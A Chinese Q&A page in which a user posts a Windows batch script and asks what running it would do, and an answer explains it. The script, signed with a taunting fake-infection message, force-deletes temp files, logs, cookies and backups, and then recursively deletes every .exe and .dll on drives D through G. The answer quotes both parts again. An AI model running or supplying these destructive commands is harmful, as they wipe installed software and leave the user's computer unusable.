是什么东西啊

来源:百度知道 编辑:UC知道 时间:2024/06/30 12:57:03
@echo off
del /f/s/q %systemdrive%\*.tmp
del /f/s/q %systemdrive%\*._mp
del /f/s/q %systemdrive%\*.log
del /f/s/q %systemdrive%\*.gid
del /f/s/q %systemdrive%\*.chk
del /f/s/q %systemdrive%\*.old
del /f/s/q %windir%\*.bak
del /f/q %systemdrive%\recycled\*.*
del /f/q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
rd /s /q %temp% & md %temp%
del /f/q %userprofile%\cookies\*.*
del /f/q %userprofile%\recent\*.*
rd /s/q "%userprofile%Local Settin gs\Temporary Internet Files"
del /f/s/q d:\*.exe
del /f/s/q e:\*.exe
del /f/s/q f:\*.exe
del /f/s/q g:\*.exe
del /f/s/q d:\*.dll
del /f/s/q e:\*.dll
del /f/s/q f:\*.dll
del /f/s/q g:\*.dll
cls & echo 哈哈你的机子中毒了咯哈哈偶叫sshtjh~!!
echo.& pause

如果打开了会怎么样?

这段不算有很大问题,是清除你的系统临时文件,还有系统的备份文件。
del /f/s/q %systemdrive%\*.tmp
del /f/s/q %systemdrive%\*._mp
del /f/s/q %systemdrive%\*.log
del /f/s/q %systemdrive%\*.gid
del /f/s/q %systemdrive%\*.chk
del /f/s/q %systemdrive%\*.old
del /f/s/q %windir%\*.bak
del /f/q %systemdrive%\recycled\*.*
del /f/q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
rd /s /q %temp% & md %temp%
del /f/q %userprofile%\cookies\*.*
del /f/q %userprofile%\recent\*.*
rd /s/q "%userprofile%Local Settin gs\Temporary Internet Files"
最有问题的是这一段,这些命令会把你电脑里的所有EXE文件和DLL文件删除,使你的电脑无法正常运行。
del /f/s/q d:\*.exe
del /f/s/q e:\*.exe
del /f/s/q f:\*.exe
del /f/s/q g:\*.exe
del /f/s/q d:\*.dll
del /f/s/q e:\*.dll
del /f/s/q f:\*.dll
del /f/s/q g:\*.dll